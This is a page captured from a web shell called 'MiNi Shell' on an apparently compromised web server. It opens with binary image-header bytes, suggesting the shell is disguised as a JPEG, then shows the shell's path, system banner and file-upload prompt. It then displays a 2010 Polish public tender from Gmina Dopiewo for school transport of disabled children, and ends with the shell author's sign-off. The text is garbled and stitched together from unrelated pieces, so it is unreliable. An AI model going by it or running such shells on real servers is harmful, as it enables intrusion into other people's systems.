JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100722/221086-N-2010.html

<p class="kh_header"><b>Dopiewo: Świadczenie usług przewozowych w zakresie dowożenia dzieci niepełnosprawnych do szkół z terenu Gminy Dopiewo, na zajęcia szkolne do szkół i placówek specjalnych na terenie miasta Poznania w roku szkolnym w roku szkolnym 2010/2011.</b><br>
<b>Numer ogłoszenia: 221086 - 2010; data zamieszczenia: 22.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dopiewo , ul. Leśna 1c, 62-070 Dopiewo, woj. wielkopolskie, tel. 0618148331 w 34, faks 061 8148092.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dopiewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług przewozowych w zakresie dowożenia dzieci niepełnosprawnych do szkół z terenu Gminy Dopiewo, na zajęcia szkolne do szkół i placówek specjalnych na terenie miasta Poznania w roku szkolnym w roku szkolnym 2010/2011..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest świadczenie usług transportowych polegających na dowozach (przywóz i odwóz) dzieci niepełnosprawnych z terenu gminy Dopiewo , na zajęcia szkolne do szkół i placówek na terenie miasta Poznania - w komunikacji zamkniętej.

2) Wykaz szkół i placówek na terenie miasta Poznania , do których dowożone są dzieci niepełnosprawne: 
- Zespół Szkół z Oddziałami Integracyjnymi Nr 1 w Poznaniu, os. Jana III Sobieskiego 102 ,
- Zespół Szkół z Oddziałami Integracyjnymi Nr 2 w Poznaniu, ul. Żonkilowa 34,
- Specjalny Ośrodek Szkolno-Wychowawczy dla Dzieci Niesłyszących w Poznaniu, ul. Bydgoska 4a ,
- Zespół Szkół Specjalnych Nr 103 z siedzibą w Poznaniu ul. Rycerska 43 (dodatkowe siedziby szkoły na ul. Floriana i Ognik 15),
- Zespół Szkół Specjalnych Nr 101 w Poznaniu, ul. Swoboda 41 ,
- Niepubliczna Szkoła Podstawowa Zawsze Razem w Poznaniu, Os. Jana III Sobieskiego 109 ,
- Niepubliczne Gimnazjum Zawsze Razem w Poznaniu, Os. Jana III Sobieskiego 109, 
- Zespół Szkół Specjalnych Nr 112, Poznań ul. Obornicka 314 ,


3) Dowóz dzieci do Poznania odbywa się z  następujących miejscowości: Dopiewa, Zakrzewa, Skórzewa, Więckowic, Konarzewa, Podłozin, Dopiewca, Trzcielina , Dąbrówki i z powrotem.

4) Ogólna liczba dzieci niepełnosprawnych dowożonych do szkół w roku szkolnym 2009/2010 wynosiła: 38 dzieci (w tym 8 na wózkach). 

5) Liczba dzieci oraz rodzaj wyżej wymienionych placówek w ciągu roku szkolnego może ulec zmianie. Ponieważ Zamawiający na dzień przygotowywania niniejszego postępowania nie ma wiedzy co do ilościowego podziału dzieci na grupy oraz godzin rozpoczęcia nauki Zamawiający wzorem lat ubiegłych przewiduje 3-4 kursy rano i 3-4 kursy powrotne. Ilość kursów uzależniona jest bowiem  od planu zajęć w roku szkolnym 2010/2011 oraz ewentualnej zmianie ilości dzieci niepełnosprawnych. 
Jeżeli ilość dzieci zwiększy się o taką liczbę, że nastąpi konieczność wprowadzenia dodatkowego piątego kursu rano i z powrotem to będzie to przedmiotem zamówienia uzupełniającego.

6) Średnia długość trasy wyliczona na podstawie danych z roku szkolnego 2009/2010 w ciągu dnia wynosi: ok. 514 km.
7) Średni dzienny czas pracy opiekunów: ok. 11 godzin 30 minut. Opiekunowie będą odpowiedzialni za osoby niepełnosprawne w czasie przewozu oraz w drodze od domu do samochodu i od samochodu do domu.
8) Do f-ry wykonawca zobowiązany będzie załączać potwierdzoną przez szkołę codzienną obecność dziecka, dokumenty określające ilość kursów, dzienną ilość przejechanych kilometrów oraz dzienną liczbę godzin pracy opiekuna.
9) Dojazdy z bazy na trasy i zjazdy z trasy do bazy oraz dojazd i zjazd samochodu  zamiennego nie będą wliczane w koszt usługi. Wykonawca zobowiązany jest w razie uszkodzenia pojazdu wykonującego przewozy do podstawienia pojazdu zastępczego. 
10) Trasy oraz ilość dzieci w miarę potrzeb i możliwości mogą być korygowane w drodze uzgodnień pomiędzy Zamawiającym a Wykonawcą. Szczegółowy harmonogram z przebiegiem tras oraz planem zajęć szkolnych Zamawiający dostarczy Wykonawcy niezwłocznie po rozpoczęciu roku szkolnego.
11) Wykonawca zobowiązany jest do punktualności wykonywania przewozów w odpowiednich warunkach bezpieczeństwa, higieny i wygody.
12) Pojazdy do  przewozów osób niepełnosprawnych wykorzystywane do świadczenia usług będących przedmiotem niniejszego postępowania muszą spełniać wszelkie wymogi określone w Rozporządzeniu Ministra Transportu i Gospodarki Morskiej oraz Spraw Wewnętrznych i Administracji z dnia 21 czerwca 199r. w sprawie znaków i sygnałów drogowych (Dz. U. Nr 58, poz. 622 z późniejszymi zmianami, ustawie z dnia 20 czerwca 1997r. - Prawo o ruchu drogowym (Dz. U. Nr 98, poz. 602 z późniejszymi) oraz Rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. Nr 32, poz. 262 z późniejszymi zmianami).
13) Wykonawca zapewni uczestniczenie w każdym kursie oprócz kierowcy jednego opiekuna, zdolnego do opieki i pomocy przewożonym dzieciom.
Opieka w czasie przejazdów nad uczniami dowożonymi do szkoły winna być organizowana z zachowaniem wymogów określonych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 31 grudnia 2002 r. /Dz. U. 6, poz. 69/ w sprawie bezpieczeństwa i higieny w publicznych i niepublicznych szkołach i placówkach §§13 i 32, oraz zgodnie z Art. 57, 57a i 63 ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym /Dz. U. Nr 98 poz. 602 ze zmianami/. Opiekę nad uczniami winni sprawować nauczyciele lub inne osoby pełnoletnie, posiadające zdolność do czynności prawnych / § 13.1 Rozporządzenia Ministra Edukacji Narodowej i Sportu z dnia 8 listopada 2001 r. w sprawie warunków i sposobu organizowania przez publiczne przedszkola, szkoły i placówki krajoznawstwa i turystyki (Dz. U. Nr 135 poz. 1516). Do zadań opiekuna  należy między innymi :
1.	Sprawdzania stanu liczebnego wewnątrz pojazdu.
2.	Dopilnowania ładu i porządku przy wsiadaniu i zajmowaniu miejsc w pojeździe.
3.	Przestrzegania zasady - opiekun wsiada ostatni i wysiada pierwszy.
4.	Ustalenia sposobu porozumiewania się z kierowcą w czasie jazdy.
5.	Zwracania uwagi na właściwe zachowanie się w czasie przejazdu.
6.	Zapewnienia bezpiecznego wsiadania i wysiadania uczniów, a także w zależności od sytuacji przejścia do szkoły, a po zakończeniu transportu zapewnienie bezpiecznego dojścia do domów. W razie potrzeby do przeprowadzenia dzieci na drugą stronę jezdni.
7.	Przestrzegania obowiązku wysiadania przez dzieci i młodzież z pojazdu tylko w miejscach dozwolonych.
8.	Zorganizowania bezpiecznego wysiadania w razie konieczności zatrzymania się na trasie, na skutek  zaistniałych okoliczności zmuszających do opuszczenia pojazdu przez dzieci i młodzież. Zabezpieczenia wyjścia na prawe pobocze, zgodnie z obowiązującym kierunkiem jazdy i wyprowadzenie w bezpieczne miejsce. 
9.	  Niedopuszczenia do przewozu dzieci i młodzieży w przypadku stwierdzenia sytuacji zagrażającej bezpieczeństwa zdrowia i życia.

Bezpieczeństwo zorganizowanych grup dzieci i młodzieży w ruchu drogowym, na rajdach, zlotach, przemarszach, wycieczkach pieszych i rowerowych oraz innych formach korzystania z dróg publicznych reguluje:

Ustawa prawo o ruchu drogowym z dnia 20 czerwca 1997 r. (Dz. U. Nr 98 poz. 602) ze zmianami. Szczególną uwagę zwrócić należy na artykuły: 6,11, 12, 18a, 27, 32, 43, 57, 57a, 60 ust. 2 pkt.4, 63, 87, 96, 97.1, 97.2 i 97.2a oraz 109 ust. 4 pkt. 1 i2.
Termin wykonania zamówienia:  rok szkolny 2010/2011 od dnia 1 września 2010r. do końca rocznych zajęć dydaktyczno-wychowawczych, nie później niż do 30 czerwca 2011r, z pominięciem okresu świat, wakacji oraz innych przerw w pracy szkoły wynikających z organizacji roku szkolnego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że przewiduje możliwość udzielenia zamówień uzupełniających  stanowiących 50 % wartości zamówienia podstawowego - w trybie z wolnej ręki , zgodnie z art. 67 ust. 1 pkt. 6 Pzp .</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.11.34.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać licencję na wykonywanie krajowego transportu drogowego osób, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2007r., Nr 125, poz. 874 ze zm.). 

Ocena spełniania wyżej opisanego warunku udziału w postępowaniu dokonana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty według zasady spełnia -nie spełnia.

W przypadku składania oferty przez Wykonawców występujących wspólnie, licencję musi złożyć każdy  z wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą udokumentować posiadanie wiedzy i doświadczenia poprzez wykazanie że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, wykonali co najmniej jedną usługę, polegającą na transporcie dzieci niepełnosprawnych do szkół o wartości min. 150 tys. zł, przez okres minimum 1 roku szkolnego.
Wykonawca musi także załączyć dokumenty (np. referencje od Zamawiających) potwierdzające, że usługa ta została  wykonana należycie.

Ocena spełniania wyżej opisanego warunku udziału w postępowaniu dokonana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty według zasady spełnia -nie spełnia.

W przypadku składania oferty przez Wykonawców występujących wspólnie, informacja może być złożona wspólnie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował sprzętem niezbędnym do wykonania zamówienia. 

Wykonawca jest zobowiązany wykazać, że dysponuje co najmniej 5 środkami transportu każdy pojazd musi posiadać ubezpieczenie OC, NW, w tym:
- dwa pojazdy z ilością miejsc siedzących co najmniej 14,
- trzy pojazdy z ilością miejsc siedzących co najmniej 9 , z homologacją do przewozu osób niepełnosprawnych,

Ocena spełniania wyżej opisanego warunku udziału w postępowaniu dokonana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty według zasady spełnia -nie spełnia.

W przypadku składania oferty przez Wykonawców występujących wspólnie, informacja może być złożona wspólnie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia tj. - min. 5 kierowcami posiadającymi prawo jazdy oraz świadectwo kwalifikacji zawodowej.

Ocena spełniania wyżej opisanego warunku udziału w postępowaniu dokonana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty według zasady spełnia -nie spełnia.

W przypadku składania oferty przez Wykonawców występujących wspólnie, informacja może być złożona wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Na ofertę składają się następujące dokumenty: 
1 Wypełniony i podpisany formularz ofertowy z wykorzystaniem załącznika  nr 1 do SIWZ.
2. Wszystkie dokumenty i oświadczenia wymienione w pkt. 9 SIWZ.
3.  Aktualna licencja na wykonywanie krajowego transportu drogowego osób.
4. Kserokopie dowodów rejestracyjnych pojazdów wskazanych w wykazie z ważnym badaniem technicznym oraz aktualnym ubezpieczeniem OC i NW.
5.  Kopie prawa jazdy kierowców oraz świadectwa kwalifikacji zawodowych.
6. Dokument lub pełnomocnictwo, z których  wynika uprawnienie osoby (osób) do składania oświadczeń woli i reprezentowania wykonawcy, jeżeli prawo to nie wynika  z rejestru.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Liczba dzieci oraz rodzaj placówek w ciągu roku szkolnego może ulec zmianie.
Trasy przewozów oraz liczba dzieci będą w zależności od potrzeb korygowane w drodze uzgodnień pomiędzy Zamawiającym a Wykonawcą. Zmiana ilości dzieci niepowodująca konieczności użycia dodatkowego pojazdu, mieści się w zakresie niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dopiewo.nowoczesnagmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Dopiewo, ul. Leśna 1c, 62-070 Dopiewo.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2010 godzina 11:00, miejsce: Urząd Gminy Dopiewo, ul. Leśna 1c, 62-070 Dopiewo w pok. Nr 5 - Biuro obsługi klienta..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com